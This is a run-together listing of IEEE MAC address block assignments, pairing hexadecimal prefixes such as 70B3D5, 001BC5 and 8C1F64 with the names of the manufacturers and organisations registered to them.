LANDLEAF ARCHITECTURE TECHNOLOGY CO.,LTD 70B3D5281 ITG.CO.LTD 70B3D5310 Conserv Solutions 70B3D503E Guan Show Technologe Co., Ltd. 70B3D58BC GSI GeoSolutions International Ltd 70B3D5EB8 Emporia Renewable Energy Corp 70B3D567E Season Electronics Ltd 70B3D5422 SUS Corporation 70B3D556D Pro-Digital Projetos Eletronicos Ltda 70B3D5F97 Typhon Treatment Systems Ltd 70B3D5FA9 CorDes, LLC 70B3D5757 GABO 70B3D5321 Yite technology 70B3D5C44 Franz Kessler GmbH 70B3D597B WIKA Alexander Wiegand SE & Co. KG 70B3D5606 OOO Research and Production Center "Computer Technologies" 70B3D55EB Loma Systems s.r.o. 70B3D55AD Profotech 70B3D5143 A & T Technologies 70B3D5A80 EVCO SPA 70B3D5CF7 GENTEC ELECTRO-OPTICS 70B3D54FF Shanghai AiGentoo Information Technology Co.,Ltd. 70B3D5CB0 Ossiaco 70B3D5519 MB connect line GmbH Fernwartungssysteme 70B3D5DAF INNOVATIVE CONCEPTS AND DESIGN LLC 70B3D54E8 Copious Imaging LLC 70B3D5EC4 hmt telematik GmbH 70B3D5A52 APEX Stabilizations GmbH 70B3D51F0 Harmonic Design GmbH 70B3D54BF Exsom Computers LLC 70B3D58CC Piranha EMS Inc. 70B3D5D16 Monnit Corporation 70B3D5568 Small Data Garden Oy 70B3D5815 Waco Giken Co., Ltd. 70B3D5067 NEOPATH INTEGRATED SYSTEMS LTDA 70B3D5F0F Kyoto Denkiki 70B3D526D Sorion Electronics ltd 70B3D5A49 Unipower AB 70B3D5514 Intelligent Security Systems (ISS) 70B3D55F8 Forcite Helmet Systems Pty Ltd 70B3D5824 Songwoo Information & Technology Co., Ltd 70B3D5292 Boston Dynamics 70B3D5F82 Preston Industries dba PolyScience 70B3D5299 KMtronic ltd 70B3D53EB Grossenbacher Systeme AG 70B3D55E8 VITEC 70B3D5E8D Natav Services Ltd. 70B3D5F94 MB connect line GmbH Fernwartungssysteme 70B3D5D23 COTT Electronics 70B3D505E VITEC 70B3D58BF Hangzhou Leaper Technology Co. Ltd. 70B3D5409 Beijing Yutian Technology Co., Ltd. 70B3D53EA DAVE SRL 70B3D5931 MARINE INSTRUMENTS, S.A. 70B3D5449 Edgeware AB 70B3D5957 EA Elektroautomatik GmbH & Co. KG 70B3D50F6 KSE GmbH 70B3D56D3 DEUTA-WERKE GmbH 70B3D5701 COMPAR Computer GmbH 70B3D591D Cubitech 70B3D572A MRC Systems GmbH 70B3D50CA VITEC 70B3D5571 Echogear 70B3D5463 WARECUBE,INC 70B3D5102 Oxford Monitoring Solutions Ltd 70B3D5DF4 Heim- & Bürokommunikation Ilmert e.K. 70B3D5DC3 Fath Mechatronics 70B3D53CB GeoSpectrum Technologies Inc 70B3D51F7 Morgan Schaffer Inc. 70B3D5E54 Beijing PanGu Company 70B3D52C0 Sensative AB 70B3D524C Astronomical Research Cameras, Inc. 70B3D5FB9 EYEDEA 70B3D5E9D INTECH 70B3D5210 Eastone Century Technology Co.,Ltd. 70B3D57FE RCH ITALIA SPA 70B3D5857 RCH ITALIA SPA 70B3D5C00 BESO sp. z o.o. 70B3D5E14 Automata Spa 70B3D58ED NanoSense 70B3D5506 Tonbo Imaging Pte Ltd 70B3D5080 ABB 70B3D5B50 iGrid T&D 70B3D5477 digitrol limited 70B3D5BD4 YUYAMA MFG Co.,Ltd 70B3D59BE Izome 70B3D5EAE Orlaco Products B.V. 70B3D5620 Orlaco Products B.V. 70B3D5FB2 KJ3 Elektronik AB 70B3D55B6 Ethical Lighting and Sensor Solutions Limited 70B3D52A6 GSI Technology 70B3D5F43 Divelbiss Corporation 70B3D58AA TATTILE SRL 70B3D532C ATION Corporation 70B3D57C4 MECT SRL 70B3D5803 Grossenbacher Systeme AG 70B3D5EA1 Qntra Technology 70B3D538D IMP-TELEKOMUNIKACIJE DOO 70B3D5E3C Densitron Technologies Ltd 70B3D5863 Shenzhen Wesion Technology Co., Ltd 70B3D5AB2 Power Electronics Espana, S.L. 70B3D55E7 Heroic Technologies Inc. 70B3D57DA Grupo Epelsa S.L. 70B3D5B60 ZAO ZEO 70B3D5107 OOO "Alyans" 70B3D55A7 ABB S.p.A. 70B3D53DD Kniggendorf + Kögler Security GmbH 70B3D5590 812th AITS 70B3D5EDE Agrident GmbH 70B3D51D9 MondeF 70B3D5354 IMP-Computer Systems 70B3D591C Alere Technologies AS 70B3D5B80 BIGHOUSE.,INC. 70B3D54F1 LG Electronics 70B3D5598 Ruag Defence France SAS 70B3D5B2D Plexus 70B3D5CE4 WAVES SYSTEM 70B3D5DC2 SwineTech, Inc. 70B3D51C0 W. H. Leary Co., Inc. 70B3D55EC Creative Electronics Ltd 70B3D52E6 IPG Photonics Corporation 70B3D51FF Audiodo AB 70B3D50CF sohonet ltd 70B3D58CD EA Elektroautomatik GmbH & Co. KG 70B3D54AB TruTeq Wireless (Pty) Ltd 70B3D52DE YUYAMA MFG Co.,Ltd 70B3D573C Centro de Ingenieria y Desarrollo industrial 70B3D5B5F CRDMDEVEOPPEMENTS 70B3D5ACA Tecnint HTE SRL 70B3D5F04 Scame Sistemi srl 70B3D5ABB David Horn Communications Ltd 70B3D5FAB Open System Solutions Limited 70B3D5FE9 Camsat Przemysław Gralak 70B3D53A4 Ascenix Corporation 70B3D56CB NAJIN automation 70B3D5553 TAALEX Systemtechnik GmbH 70B3D5C8E Coral Telecom Limited 70B3D5F6F Smashtag Ltd 70B3D530F Cardinal Scales Manufacturing Co 70B3D59F7 Foerster-Technik GmbH 70B3D5D01 Vision4ce Ltd 70B3D5543 wallbe GmbH 70B3D5A84 SOREL GmbH Mikroelektronik 70B3D5EC3 Virtual Control Systems Ltd 70B3D5510 PSL ELEKTRONİK SANAYİ VE TİCARET A.S. 70B3D5302 DogWatch Inc 70B3D549E CAPTEMP, Lda 70B3D5B9A Potter Electric Signal Co. LLC 70B3D5990 Energy Wall 70B3D5437 Digital Way 70B3D5F22 Shengli Financial Software Development 70B3D51E8 Gogo BA 70B3D52F5 eze System, Inc. 70B3D5403 Mighty Cube Co., Ltd. 70B3D5C9D APG Cash Drawer, LLC 70B3D5890 EIDOS s.r.l. 70B3D5F51 IoT Routers Limited 70B3D5CC2 LSC Lighting Systems (Aust) Pty Ltd 70B3D57DC Software Systems Plus 70B3D5F16 BRS Sistemas Eletrônicos 70B3D5A5F Daatrics LTD 70B3D5E5D Boffins Technologies AB 70B3D540E Liaoyun Information Technology Co., Ltd. 70B3D56B8 BT9 70B3D56D2 Ahrens & Birner Company GmbH 70B3D5EE7 BLUE-SOLUTIONS CANADA INC. 70B3D543F biosilver .co.,ltd 70B3D5355 Hongin., Ltd 70B3D5FD7 Centum Adetel Group 70B3D542E Dr. Zinngrebe GmbH 70B3D5FA5 Shenzhen Hui Rui Tianyan Technology Co., Ltd. 70B3D5518 CRUXELL Corp. 70B3D5E94 Lumiplan Duhamel 70B3D50EA AEV Broadcast Srl 70B3D5A9C Veo Technologies 70B3D54EA Vocality international T/A Cubic 70B3D5F58 CDR SRL 70B3D531B SilTerra Malaysia Sdn. Bhd. 70B3D5A64 Newshine 70B3D5DB6 csintech 70B3D59D1 OS42 UG (haftungsbeschraenkt) 70B3D5848 Aldridge Electrical Industries 70B3D5675 alfamation spa 70B3D58C6 Onosokki Co.,Ltd 70B3D502F LEGENDAIRE TECHNOLOGY CO., LTD. 70B3D57F5 Incusense 70B3D5123 Amfitech ApS 70B3D5CC3 Fidalia Networks Inc 70B3D5AC4 Lexi Devices, Inc. 70B3D58EB Procon Electronics Pty Ltd 70B3D55F9 MB connect line GmbH Fernwartungssysteme 70B3D5EA8 Dia-Stron Limited 70B3D5014 FRAKO Kondensatoren und Anlagenbau GmbH 70B3D5961 TASK SISTEMAS DE COMPUTACAO LTDA 70B3D51CC AooGee Controls Co., LTD. 70B3D507B wallbe GmbH 70B3D509A Akse srl 70B3D532D Hanwell Technology Co., Ltd. 70B3D5A54 provedo 70B3D5C41 Merlin CSI 70B3D50C9 LINEAGE POWER PVT LTD., 70B3D5B0B INTERNET PROTOCOLO LOGICA SL 70B3D5BF9 Okolab Srl 70B3D521F CHRONOMEDIA 70B3D51F8 Convergent Design 70B3D5F8A FRS GmbH & Co. KG 70B3D5E9E MSB Elektronik und Gerätebau GmbH 70B3D51BE Potter Electric Signal Co. LLC 70B3D5CD0 Ellenex Pty Ltd 70B3D55FA TEX COMPUTER SRL 70B3D5C66 Blue Access Inc 70B3D5015 EN ElectronicNetwork Hamburg GmbH 70B3D52D2 SHANGHAI IRISIAN OPTRONICS TECHNOLOGY CO.,LTD. 70B3D5382 Naval Group 70B3D5037 EIFFAGE ENERGIE ELECTRONIQUE 70B3D5A82 Telefrank GmbH 70B3D54C0 Technica Engineering GmbH 70B3D5651 Roxford 70B3D5B74 OnYield Inc Ltd 70B3D51F4 Hangzhou Woosiyuan Communication Co.,Ltd. 70B3D58D9 MB connect line GmbH Fernwartungssysteme 70B3D5A76 Pietro Fiorentini 70B3D5363 Contec Americas Inc. 70B3D5EF4 Orange Tree Technologies Ltd 70B3D592F SiFive 70B3D5D6A KnowRoaming 70B3D57D6 Yukilab 70B3D5BAF SYS TEC electronic GmbH 70B3D5749 Granite River Labs Inc 70B3D5526 FlowNet LLC 70B3D5B43 ZAO ZEO 70B3D5D4A OÜ ELIKO Tehnoloogia Arenduskeskus 70B3D5576 Shandong Hospot IOT Technology Co.,Ltd. 70B3D52FE Yaham Optoelectronics Co., Ltd 70B3D54A6 HZHY TECHNOLOGY 70B3D5F98 Metrum Sweden AB 70B3D52BF FOSHAN VOHOM 70B3D578A Hills Health Solutions 70B3D5A0D Globalcom Engineering SPA 70B3D5602 Quantum Opus, LLC 70B3D5941 Triax A/S 70B3D51CB MatchX GmbH 70B3D5C1C D.E.M. SPA 70B3D5228 HEITEC AG 70B3D5A86 Divigraph (Pty) LTD 70B3D57A3 Impulse Automation 70B3D5BFA NESA SRL 70B3D5410 Avant Technologies, Inc 70B3D5F87 SHINWA INDUSTRIES, INC. 70B3D50F3 MonsoonRF, Inc. 70B3D5CB4 Planewave Instruments 70B3D54A0 FLUDIA 70B3D5E86 YUYAMA MFG Co.,Ltd 70B3D51B9 RELISTE Ges.m.b.H. 70B3D5069 ONDEMAND LABORATORY Co., Ltd. 70B3D508A MB connect line GmbH Fernwartungssysteme 70B3D5670 Particle sizing systems 70B3D5132 Hagenuk KMT Kabelmesstechnik GmbH 70B3D56F0 iTelaSoft Pvt Ltd 70B3D5547 CE LINK LIMITED 70B3D50C6 Embedded Arts Co., Ltd. 70B3D5492 Jiangsu Jinheng Information Technology Co.,Ltd. 70B3D5BA2 MAMAC Systems, Inc. 70B3D59E2 Ofil USA 70B3D5EF7 DAVE SRL 70B3D5BB3 APG Cash Drawer, LLC 70B3D55DB Movicom LLC 70B3D53CF Systems Engineering Arts Pty Ltd 70B3D5BB4 Integritech 70B3D58F7 I.E. Sevko A.V. 70B3D5A32 Toughdog Security Systems 70B3D507E ENTEC Electric & Electronic CO., LTD 70B3D5841 Stanet Co.,Ltd 70B3D5897 EFG CZ spol. s r.o. 70B3D55F6 FreeFlight Systems 70B3D53AF Turbo Technologies Corporation 70B3D5086 Husty M.Styczen J.Hupert Sp.J. 70B3D5FAE Silixa Ltd 70B3D5BBF Ensys srl 70B3D5CD3 Controlrad 70B3D5284 Globalcom Engineering SPA 70B3D54E5 viZaar industrial imaging AG 70B3D5EC7 Neoptix Inc. 70B3D5991 Javasparrow Inc. 70B3D59D7 KM OptoElektronik GmbH 70B3D5203 WOOJIN Inc 70B3D5DFA Newtouch Electronics (Shanghai) Co.,Ltd. 70B3D5809 Tecnint HTE SRL 70B3D5D44 ic-automation GmbH 70B3D534E Risk Expert sarl 70B3D5768 Kazan Networks Corporation 70B3D55FB TELEPLATFORMS 70B3D5BEA Virtuosys Ltd 70B3D5273 WeVo Tech 70B3D5A35 Sicon srl 70B3D56E7 AML 70B3D5631 SENSO2ME 70B3D55D8 LYNX Technik AG 70B3D508D Clover Electronics Technology Co., Ltd. 70B3D5ED1 Przemyslowy Instytut Automatyki i Pomiarow 70B3D5E57 Iradimed 70B3D5DD1 em-tec GmbH 70B3D5AF0 SEASON DESIGN TECHNOLOGY 70B3D5445 Advanced Devices SpA 70B3D574D SPEECH TECHNOLOGY CENTER LIMITED 70B3D569F T+A elektroakustik GmbH & Co.KG 70B3D518E NIPPON SEIKI CO., LTD. 70B3D52B0 Beijing Zhongyi Yue Tai Technology Co., Ltd 70B3D5D3C HRT 70B3D52E2 Spark Lasers 70B3D5888 Zetechtics Ltd 70B3D5129 OOO "Microlink-Svyaz" 70B3D538B Lookman Electroplast Industries Ltd 70B3D560A TATA POWER SED 70B3D580B Fischer Block, Inc. 70B3D5175 Akribis Systems 70B3D5831 Arnouse Digital Devices Corp 70B3D5FEF HANGZHOU HUALAN MICROELECTRONIQUE CO.,LTD 70B3D564C ACEMIS FRANCE 70B3D5549 Procon automatic systems GmbH 70B3D5F45 Norbit ODM AS 70B3D52C2 Quantum Detectors 70B3D5572 CRDE 70B3D5332 InnoSenT 70B3D5C60 Gogo BA 70B3D5FF1 Data Strategy Limited 70B3D5370 Inphi Corporation 70B3D5276 TELL Software Hungaria Kft. 70B3D517A Gencoa Ltd 70B3D5AD2 Wart-Elektronik 70B3D59B2 CONTINENT, Ltd 70B3D5E8E Macnica Technology 70B3D5F0D MeQ Inc. 70B3D5F77 Satcube AB 70B3D5B2B Vtron Pty Ltd 70B3D55E0 Hexagon Metrology SAS 70B3D5E04 Combilent 70B3D5115 Welltec Corp. 70B3D5773 Rugged Science 70B3D5288 Bresslergroup 70B3D5040 Savari Inc 70B3D5C45 Stiebel Eltron GmbH 70B3D5A30 SHEN ZHEN HUAWANG TECHNOLOGY CO; LTD 70B3D50F1 Beijing One City Science & Technology Co., LTD 70B3D5AA4 Pullnet Technology,S.L. 70B3D5C68 Mini Solution Co. Ltd. 70B3D553B Mr.Loop 70B3D5D40 CRDE 70B3D5753 HCH. Kündig & CIE. AG 70B3D50E3 SinTau SrL 70B3D50D9 Brechbuehler AG 70B3D50BC Practical Software Studio LLC 70B3D536F BuddyGuard GmbH 70B3D56EA Edgeware AB 70B3D52E5 Fläkt Woods AB 70B3D5D37 Sicon srl 70B3D5CAE THEMA 70B3D5241 Bolide Technology Group, Inc. 70B3D515C Woods Hole Oceanographic Institution 70B3D5FC2 HUNTER LIBERTY CORPORATION 70B3D5F3B Epdm Pty Ltd 70B3D50A3 Solace Systems Inc. 70B3D539E Lanmark Controls Inc. 70B3D575A Standard Backhaul Communications 70B3D5D84 Sentry360 70B3D5635 Cosylab d.d. 70B3D5443 Slot3 GmbH 70B3D51E4 Tecnologix s.r.l. 70B3D52AD Opgal Optronic Industries 70B3D55D3 Supracon AG 70B3D5FF4 Serveron Corporation 70B3D5A4C Alere Technologies AS 70B3D5352 Globalcom Engineering SPA 70B3D53B7 Paul Scherrer Institut (PSI) 70B3D5924 Meridian Technologies Inc 70B3D5A36 Beijing DamingWuzhou Science&Technology Co., Ltd. 70B3D51E9 comtime GmbH 70B3D5C7E BirdDog Australia 70B3D5BD5 Synics AG 70B3D5A58 MCQ TECH GmbH 70B3D5785 Density Inc. 70B3D539B IROC AB 70B3D52DB ProtoPixel SL 70B3D599E Trinity College Dublin 70B3D549A HAXE SYSTEME 70B3D5AC5 ATOM GIKEN Co.,Ltd. 70B3D54CE Agilack 70B3D52C3 Proterra 70B3D54EF CMI, Inc. 70B3D5083 ZAO ZEO 70B3D5BC2 DWEWOONG ELECTRIC Co., Ltd. 70B3D5405 MG s.r.l. 70B3D5F95 Get SAT 70B3D554C Husty M.Styczen J.Hupert Sp.J. 70B3D548A George Wilson Industries Ltd 70B3D5F30 ADE Technology Inc. 70B3D5CD5 Apantac LLC 70B3D5947 Checkbill Co,Ltd. 70B3D5009 HolidayCoro 70B3D5EBD midBit Technologies, LLC 70B3D5A8E OMESH CITY GROUP 70B3D5142 DAVE SRL 70B3D5BE8 AndFun Co.,Ltd. 70B3D528D Technica Engineering GmbH 70B3D51BB EFENTO T P SZYDŁOWSKI K ZARĘBA SPÓŁKA JAWNA 70B3D5550 Merten GmbH&CoKG 70B3D5A5C Molekule 70B3D5178 Gamber Johnson-LLC 70B3D51C8 LDA audio video profesional S.L. 70B3D5C15 Sensobox GmbH 70B3D5C4F AE Van de Vliet BVBA 70B3D548F Seiwa Giken 70B3D567B Stesalit Systems Ltd 70B3D585D ATHREYA INC 70B3D5D67 ALPHA Corporation 70B3D5BF5 Acacia Research 70B3D57DD Excel Medical Electronics LLC 70B3D5486 ChongQing JianTao Technology Co., Ltd. 70B3D5D91 FoodALYT GmbH 70B3D53AE Exicom Technologies fze 70B3D5C0E SYSDEV Srl 70B3D5599 LECO Corporation 70B3D5E71 SiS Technology 70B3D53D5 oxynet Solutions 70B3D5B11 CAB S.R.L. 70B3D5A91 IDEAL INDUSTRIES Ltd t/a Casella 70B3D5AE5 BeatCraft, Inc. 70B3D57B4 Zumbach Electronic AG 70B3D5461 TESEC Corporation 70B3D5FDE AERONAUTICAL & GENERAL INSTRUMENTS LTD. 70B3D5750 Neurio Technology Inc. 70B3D5FC9 Shanghai EICT Global Service Co., Ltd 70B3D51A3 Telairity Semiconductor 70B3D533E Dynamic Connect (Suzhou) Hi-Tech Electronic Co.,Ltd. 70B3D5A4F Weltek Technologies Co. Ltd. 70B3D5BE6 CCII Systems (Pty) Ltd 70B3D5243 Rohde&Schwarz Topex SA 70B3D509D PuS GmbH und Co. KG 70B3D56E6 Eleven Engineering Incorporated 70B3D5AF1 Emka Technologies 70B3D5ABA CL International 70B3D535F Aplex Technology Inc. 70B3D5C87 Siemens AG 70B3D518B Aplex Technology Inc. 70B3D538C MiraeSignal Co., Ltd 70B3D5325 BlueMark Innovations BV 70B3D513E Stara S/A Indústria de Implementos Agrícolas 70B3D568D "Meta-chrom" Co. Ltd. 70B3D5840 xm 70B3D5283 TextNinja Co. 70B3D550E Micro Trend Automation Co., LTD 70B3D5E85 Explorer Inc. 70B3D5D63 CRDE 70B3D594F MART NETWORK SOLUTIONS LTD 70B3D5440 Discover Video 70B3D5A96 Östling Marking Systems GmbH 70B3D530C Sicon srl 70B3D5BB7 Innoflight, Inc. 70B3D54D5 Moog Rekofa GmbH 70B3D560F Tanaka Information System, LLC. 70B3D5259 Zebra Elektronik A.S. 70B3D5640 Electronic Equipment Company Pvt. Ltd. 001BC5087 Onnet Technologies and Innovations LLC 70B3D5974 Jireh Industries Ltd. 70B3D501A Cubro Acronet GesmbH 70B3D54B7 Aplex Technology Inc. 70B3D58D8 VNG Corporation 70B3D59CB Alligator Communications 70B3D53C5 P4Q ELECTRONICS, S.L. 70B3D59EB Preston Industries dba PolyScience 70B3D57E2 Depro Électronique inc 70B3D5F08 Szabo Software & Engineering UK Ltd 70B3D51A8 STC "Rainbow" Ltd. 70B3D5070 Lumiplan Duhamel 70B3D57ED The Things Network Foundation 70B3D5CBE Ensura Solutions BV 70B3D5BA1 Cathwell AS 70B3D5652 Robert Bosch, LLC 70B3D545D Sensapex Oy 70B3D55A3 CT Company 70B3D5BFE Aplex Technology Inc. 70B3D5120 GSP Sprachtechnologie GmbH 70B3D5F7B KST technology 70B3D5CCA SIEMENS AS 70B3D58B2 NPF Modem, LLC 70B3D5EEE SOCIEDAD IBERICA DE CONSTRUCCIONES ELECTRICAS, S.A. (SICE) 70B3D533B Seal Shield, LLC 70B3D5054 Groupeer Technologies 70B3D5323 TATTILE SRL 70B3D58F3 TATTILE SRL 70B3D5609 PBSI Group Limited 70B3D5CA8 Grupo Epelsa S.L. 70B3D575C UPM Technology, Inc 70B3D5C3B Vironova AB 70B3D566B Innitive B.V. 70B3D51B4 5nines 70B3D5BB8 Al Kamel Systems S.L. 70B3D5996 XpertSea Solutions inc. 70B3D59D4 Wartsila Voyage Limited 70B3D5671 Sea Shell Corporation 001BC5042 ChamSys Ltd 70B3D5D07 Waversa Systems 70B3D5FC1 InDiCor 70B3D5081 IST Technologies (SHENZHEN) Limited 70B3D5E48 TDI. Co., LTD 70B3D57B9 QIAGEN Instruments AG 70B3D5066 North Pole Engineering, Inc. 70B3D5BED Itrinegy Ltd. 70B3D5185 R&D Gran-System-S LLC 70B3D57AA Sadel S.p.A. 70B3D5B34 Medtronic 70B3D5740 Prisma Telecom Testing Srl 70B3D5771 Apator Miitors ApS 70B3D5C26 Triple Play Communications 70B3D5F85 Solystic 70B3D5817 Aplex Technology Inc. 70B3D576F OTI LTD 70B3D55EE Mikrotron Mikrocomputer, Digital- und Analogtechnik GmbH 70B3D52F6 TATTILE SRL 70B3D5DD7 DETECT Australia 70B3D5F79 Firehose Labs, Inc. 70B3D5303 Fuchu Giken, Inc. 70B3D5B51 Critical Link LLC 70B3D5F11 BroadSoft Inc 70B3D5504 Xsight Systems Ltd. 70B3D5E0D Sigma Connectivity AB 70B3D5D90 Aplex Technology Inc. 70B3D52EB BRNET CO.,LTD. 70B3D58A4 Phyton, Inc. Microsystems and Development Tools 70B3D59C9 PK Sound 70B3D5A56 DORLET SAU 70B3D5079 CheckBill Co,Ltd. 70B3D57C3 Flexim Security Oy 70B3D53E4 Neptec Technologies Corp. 70B3D5714 Alturna Networks 70B3D5230 CT Company 70B3D50FC vitalcare 70B3D54DB Temperature@lert 70B3D5FCD Engage Technologies 70B3D5339 Sierra Nevada Corporation 70B3D51A0 UFATECH LTD 70B3D5730 Videogenix 70B3D57A8 dieEntwickler Elektronik GmbH 70B3D5D7A Speedifi Inc 70B3D5916 Techno Mathematical Co.,Ltd 70B3D5838 Tofino 70B3D563B Lazer Safe Pty Ltd 70B3D5703 StromIdee GmbH 70B3D5324 Thales Nederland BV 70B3D5361 Parent Power 70B3D5431 Power Electronics Espana, S.L. 70B3D50A6 PA CONSULTING SERVICES 70B3D5B35 Rexxam Co.,Ltd. 70B3D54B1 LACE LLC. 70B3D5FE7 VEILUX INC. 70B3D51A5 METRONIC APARATURA KONTROLNO - POMIAROWA 70B3D5AB5 BroadSoft Inc 70B3D59CA KOMSIS ELEKTRONIK SISTEMLERI SAN. TIC. LTD.STI 70B3D54DC JK DEVICE CORPORATION 70B3D54F4 WiTagg, Inc 70B3D580D Data Physics Corporation 70B3D5589 Cityntel OU 70B3D5CE3 Dalcnet srl 70B3D5F78 Manvish eTech Pvt. Ltd. 70B3D5231 DELTA TAU DATA SYSTEMS, INC. 70B3D54BB Plazma-T 70B3D54DF Nidec Avtron Automation Corp 70B3D59BD Signal Processing Devices Sweden AB 70B3D5F72 Hanshin Electronics 70B3D5421 North Star Bestech Co., 70B3D5811 CJSC «INTERSET» 70B3D5DF2 AML 70B3D56DA Enovative Networks, Inc. 70B3D5600 Stellwerk GmbH 70B3D5875 Peek Traffic 70B3D574C Kwant Controls BV 70B3D56FA Dataforth Corporation 70B3D546F serva transport systems GmbH 70B3D59D3 Communication Technology Ltd. 70B3D5500 Mistral Solutions Pvt. LTD 70B3D55C8 YUYAMA MFG Co.,Ltd 70B3D5285 Bentec GmbH Drilling & Oilfield Systems 70B3D5D46 Contineo s.r.o. 70B3D5EC6 ESII 70B3D56E0 ABB SPA - DMPC 70B3D5665 CertUsus GmbH 70B3D563A DAVE SRL 70B3D5C9B Tieto Sweden AB 70B3D5EA3 Gridless Power Corperation 70B3D57F1 AeroVision Avionics, Inc. 70B3D5E95 BroadSoft Inc 70B3D5C03 XAVi Technologies Corp. 70B3D5AE3 Zhejiang Wellsun Electric Meter Co.,Ltd 70B3D5E75 Watteco 70B3D52D5 Teuco Guzzini 70B3D5DE7 Innominds Software Private Limited 70B3D5DAD GD Mission Systems 70B3D57EF CRAVIS CO., LIMITED 70B3D5B9B Elektronik Art 70B3D5CF3 Mesh Motion Inc 70B3D5097 Avant Technologies 70B3D505F UNISOR MULTISYSTEMS LTD 70B3D5EFE MEIDEN SYSTEM SOLUTIONS 70B3D5412 TATTILE SRL 70B3D535D Fresh Idea Factory BV 70B3D51A1 HMicro Inc 70B3D57CD Molekuler Goruntuleme A.S. 70B3D56F8 SENSEON Corporation 70B3D5092 inomed Medizintechnik GmbH 70B3D5182 Kitron UAB 70B3D55EA KYS,INC 70B3D5B8D JungwooEng Co., Ltd 70B3D5112 DiTEST Fahrzeugdiagnose GmbH 70B3D5BEC Tokyo Communication Equipment MFG Co.,ltd. 70B3D5708 IBM Research GmbH 70B3D557C Automata GmbH & Co. KG 70B3D51F5 Martec S.p.A. 70B3D5205 Esource Srl 70B3D5025 Elsuhd Net Ltd Co. 70B3D57B3 BroadSoft Inc 70B3D5062 RM Michaelides Software & Elektronik GmbH 70B3D5B8C ePOINT Embedded Computing Limited 70B3D554D Qingdao Haitian Weiye Automation Control System Co., Ltd 70B3D5AA0 Simple Works, Inc. 70B3D5709 AML 70B3D5058 Telink Semiconductor CO, Limtied, Taiwan 70B3D5BBE Sunrise Systems Electronics Co. Inc. 70B3D5751 GNF 70B3D5BDA 5-D Systems, Inc. 70B3D5755 LandmarkTech Systems Technology Co.,Ltd. 70B3D5956 AeroVision Avionics, Inc. 70B3D5B08 Secuinfo Co. Ltd 70B3D5587 INCAA Computers 70B3D5A15 Intercore GmbH 70B3D5EF3 octoScope 70B3D57E7 Atessa, Inc. 70B3D5ADD GHL Systems Berhad 70B3D523C Quasonix, LLC 70B3D5C78 NETA Elektronik AS 70B3D5E4A ICP NewTech Ltd 70B3D5CBC Procon Electronics Pty Ltd 70B3D5E74 Exfrontier Co., Ltd. 70B3D5D47 YotaScope Technologies Co., Ltd. 70B3D5D86 WPGSYS Pte Ltd 70B3D5A0B ambiHome GmbH 70B3D55A8 Farmobile, LLC 70B3D5184 XV360 Optical Information Systems Ltd. 70B3D56B6 INRADIOS GmbH 70B3D5E08 Olssen 70B3D5EDD Solar Network & Partners 70B3D53DE ELOMAC Elektronik GmbH 70B3D5AE9 Cari Electronic 001BC50C3 inomatic GmbH 001BC50BE YESpay International Ltd 001BC50A1 Hangzhou Zhiping Technology Co., Ltd. 001BC50A2 Hettich Benelux 001BC509A Shenzhen Guang Lian Zhi Tong Limited 001BC509F ENTE Sp. z o.o. 001BC5095 PREVAC sp. z o.o. 001BC508A Topicon 001BC5083 DIWEL 001BC5077 Momentum Data Systems 001BC5082 TGS Geophysical Company (UK) Limited 001BC5072 Ohio Semitronics, Inc. 001BC5075 Kitron GmbH 001BC5068 HCS KABLOLAMA SISTEMLERI SAN. ve TIC.A.S. 001BC5060 ENSTECH 001BC505C Suretrak Global Pty Ltd 001BC504F Orbital Systems, Ltd. 001BC504E Mitsubishi Electric India PVT. LTD 001BC5046 GÉANT 001BC504A Certis Technology International Pte Ltd 001BC504B Silicon Controls 001BC503C Xiphos Systems Corp. 001BC503D rioxo GmbH 001BC503B Promixis, LLC 001BC5036 LOMAR SRL 001BC502F Fibrain Co. Ltd. 001BC502D DDTRONIK Dariusz Dowgiert 001BC502A Analytical Instrument Systems, Inc. 001BC5027 CAMEA, spol. s r.o. 001BC5024 ANNECY ELECTRONIQUE SAS 001BC5023 MAGO di Della Mora Walter 001BC501E Private 001BC501C Coolit Systems, Inc. 001BC501B Commonwealth Scientific and Industrial Research Organisation 001BC5017 cPacket Networks 001BC5012 Tokyo Cosmos Electric, Inc. 001BC5003 MicroSigns Technologies Inc 8C1F649A1 Pacific Software Development Co., Ltd. 8C1F64495 DAVE SRL 8C1F64BC1 CominTech, LLC 8C1F64AD0 Elektrotechnik & Elektronik Oltmann GmbH 70B3D5C0A Infosocket Co., Ltd. 8C1F64AE5 Ltec Co.,Ltd 8C1F64E4B ALGAZIRA TELECOM SOLUTIONS 8C1F641A0 Engage Technologies 8C1F6498C PAN Business & Consulting (ANYOS] 8C1F64CA7 eumig industrie-TV GmbH. 8C1F64F53 Beckman Coulter Inc 8C1F6467E LDA Audiotech 8C1F6479F Hiwin Mikrosystem Corp. 8C1F64B6D Andy-L Ltd 8C1F64863 EngiNe srl 8C1F64677 FREY S.J. 8C1F6462C Hangzhou EasyXR Advanced Technology Co., Ltd. 8C1F64898 Copper Connections Ltd 70B3D5C1D Kranze Technology Solutions, Inc. 8C1F642DE Polar Bear Design 8C1F647E3 UNE SRL 8C1F64440 MB connect line GmbH Fernwartungssysteme 8C1F64937 H2Ok Innovations 8C1F644D9 SECURICO ELECTRONICS INDIA LTD 8C1F649F5 YUYAMA MFG Co.,Ltd 8C1F642D0 Cambridge Research Systems Ltd 8C1F64A56 Flextronics International Kft 8C1F6441C KSE GmbH 8C1F642CB Smart Component Technologies Ltd 8C1F644A0 Tantec A/S 8C1F64CB5 Gamber-Johnson LLC 8C1F64A77 Rax-Tech International 8C1F6447D EB NEURO SPA 8C1F64CB7 ARKRAY,Inc.Kyoto Laboratory 70B3D5591 Medicomp, Inc 70B3D5279 Medicomp, Inc 8C1F64E92 EA Elektro-Automatik 8C1F6484A Bitmapper Integration Technologies Private Limited 8C1F6464E Nilfisk Food 8C1F6488E CubeWorks, Inc. 8C1F644DC BESO sp. z o.o. 8C1F64C85 Potter Electric Signal Co. LLC 70B3D5251 Tap Home, s.r.o. 8C1F6418B M-Pulse GmbH & Co.KG 8C1F64E10 Scenario Automation 8C1F6499E EIDOS s.r.l. 70B3D5FFF Private 8C1F64811 Panoramic Power 70B3D5851 Exascend, Inc. 8C1F64BB3 Zaruc Tecnologia LTDA 8C1F643BB Clausal Computing Oy 8C1F64F50 Vigor Electric Corp. 70B3D5ADB RF Code 8C1F64D46 End 2 End Technologies 8C1F648DA Dart Systems Ltd 8C1F64138 Vissavi sp. z o.o. 70B3D5CF6 Tornado Modular Systems 8C1F6497F Talleres de Escoriaza SA 8C1F64E53 T PROJE MUHENDISLIK DIS TIC. LTD. STI. 8C1F646E2 SCU Co., Ltd. 